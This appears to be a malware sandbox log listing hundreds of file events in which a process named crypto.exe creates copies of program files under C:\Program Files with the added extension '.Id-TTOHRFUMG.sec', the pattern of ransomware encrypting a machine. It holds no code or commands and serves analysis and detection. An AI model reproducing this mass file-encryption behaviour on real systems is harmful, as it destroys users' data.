File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00218_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Response.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSCOL11.PPD.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN096.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSHY7FR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\EMAIL11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fr.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\hu.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239965.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02262_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Grid.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OneNote\SendToOneNote-PipelineConfig.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_WMC_LogoText.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\authplay.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099200.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107254.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00373_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_bg.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SlateBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\NAVBRPH2.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Star_Half.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD06102_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME29.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\NAME.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN103.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01299_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libdemuxdump_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15172_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02097_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Sts2.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\JUNGLE.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\30.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Horizon.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Modern.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_mid.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFPrevHndlr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_es-419.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Majuro.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL092.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME52.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\FindBlock.pps.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Budapest.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WhiteboxMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\msmdlocal.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-image-inset.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02122_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile16.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\management.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Urban.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7EN.LEX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALHM.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libaribsub_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tallinn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01659_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02285_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18189_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7FR.LEX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\12.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00172_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCWIZ\UTILITY.ACCDA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02431_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00135_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\ShowUnregister.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\scene_button_style_default_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02444_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_travel_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00564_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\NOTES.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-3.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\MST.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00419_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14539_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\VSTAClientPkg.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_drop_shadow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NBOOK_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\RESEND.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)greenStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\New_Salem.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Horizon.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318804.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\row_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01218_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02094_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_SlateBlue.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\control\libntservice_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\PST8.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\AUTOSHAP.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR44B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPUNCT.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\slideshow_glass_frame.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ViewerPS.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00923_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00688_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107138.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153273.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01746_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15057_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15018_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR22F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\NL7MODELS000A.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Guam.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\weather.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_over.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR50F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\mozavutil.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Projects.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285822.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152704.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\Servers\RELAY.CER.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\COUGH.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\OrielMergeLetter.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libspeex_resampler_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\wmpshare.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720x480icongraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ApothecaryResume.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsHomePage.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\AST4.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099179.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107712.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18242_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\ACTIVITY.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\GROOVE.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\6.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\42.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKDECS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsPreviewTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ExecutiveResume.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Mail\oeimport.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18250_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107746.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0240719.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImageMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03464_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\PhotoBase.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_orange.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR33F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_FormsHomePageBlank.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285820.WMF.Id-TTOHRFUMG.sec	crypto.exe
